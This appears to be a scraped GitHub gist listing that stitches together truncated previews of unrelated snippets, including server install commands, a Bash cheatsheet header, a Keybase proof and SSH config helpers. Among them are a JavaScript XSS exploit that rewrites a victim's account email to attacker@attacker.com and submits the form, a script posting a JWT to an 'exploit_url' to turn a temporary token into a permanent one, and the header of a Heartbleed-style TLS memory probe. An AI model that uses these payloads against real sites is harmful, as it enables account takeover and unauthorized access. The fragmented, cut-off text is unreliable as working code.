I hereby claim:
- I am mikkz on github.
- I am mikkz (https://keybase.io/mikkz) on keybase.
- I have a public key whose fingerprint is 72E0 8AB8 3F6C 85FB 211D CDA9 9445 9C62 CFB8 340B
To claim this, I am signing this object:
## Install NGINX | |
$ sudo yum install nginx -y | |
## Install PHP and PHP-FPM | |
$ sudo yum install php -y | |
$ sudo yum install php-fpm -y | |
## Configure NGINX (see below) | |
$ sudo nano /etc/nginx/conf.d/default.conf |
#!/bin/bash | |
##################################################### | |
# Name: Bash CheatSheet for Mac OSX | |
# | |
# A little overlook of the Bash basics | |
# | |
# Usage: | |
# | |
# Author: J. Le Coupanec | |
# Date: 2014/11/04 |
#!/usr/bin/python | |
# Modified by Travis Lee | |
# Last Updated: 4/21/14 | |
# Version 1.16 | |
# | |
# -changed output to display text only instead of hexdump and made it easier to read | |
# -added option to specify number of times to connect to server (to get more data) | |
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... | |
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) |
// a Simple XSS exploit for email change | |
// Shawar Khan | |
var dark_window = window.open('https://www.target.com/settings'); | |
dark_window.addEventListener('load', | |
function exploit_run(){ | |
dark_window.document.body.getElementsByTagName('form')[0][2].value='attacker@attacker.com' // changes email | |
dark_window.document.body.getElementsByTagName('form')[0][40].click() // clicks for submission |
# A sample code that obtains a permanent JWT token when provided a temporary JWT token | |
import json | |
import requests | |
import sys | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
jwt_token=raw_input("Enter token > ") | |
exploit_url = "https://secure.site.com:443/aapi/v1/authentications/token" | |
exploit_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://www.site.com", "authorization": "Bearer "+str(jwt_token), "content-type": "application/json", "origin": "https://www.site.com", "Connection": "clos"} |
if [ -e ~/.ssh/config ]; then | |
echo | |
echo Server List\(s\) | |
echo | |
cat ~/.ssh/config | |
echo | |
elif [ ! -f ~/.ssh/config ]; then | |
echo | |
echo No Server Access or ~/.ssh/config Not Found | |
echo |
I hereby claim:
To claim this, I am signing this object:
$ cd ~ | |
$ sudo curl -sS https://getcomposer.org/installer | sudo php | |
$ sudo mv composer.phar /usr/local/bin/composer | |
$ sudo ln -s /usr/local/bin/composer /usr/bin/composer | |
then you can run | |
$ sudo composer install |
UPDATE (March 2020, thanks @ic): I don't know the exact AMI version but yum install docker
now works on the latest Amazon Linux 2. The instructions below may still be relevant depending on the vintage AMI you are using.
Amazon changed the install in Linux 2. One no-longer using 'yum' See: https://aws.amazon.com/amazon-linux-2/release-notes/
sudo amazon-linux-extras install docker
sudo service docker start